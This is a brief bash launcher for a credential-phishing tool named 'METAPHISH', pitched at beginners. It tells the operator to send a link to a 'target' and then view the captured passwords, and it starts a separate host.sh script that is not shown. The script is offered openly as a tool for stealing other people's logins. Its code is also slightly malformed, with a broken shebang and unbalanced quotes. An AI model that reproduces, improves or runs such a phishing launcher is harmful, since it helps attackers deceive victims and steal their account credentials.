#!bin/bash
clear
echo "METAPHISH STARTED..."
echo
echo "Tool By nerdhacker000 On Github, Made For Beginners"
echo "---------------------------------------" 
echo "1. Type your email and send link to target"
echo "---------------------------------------" 
echo "2. Type:"vpass"to view passwords
echo "---------------------------------------" 
echo "3 Go to my website for more: nerdhaka.blogspot.com" 
sh host.sh
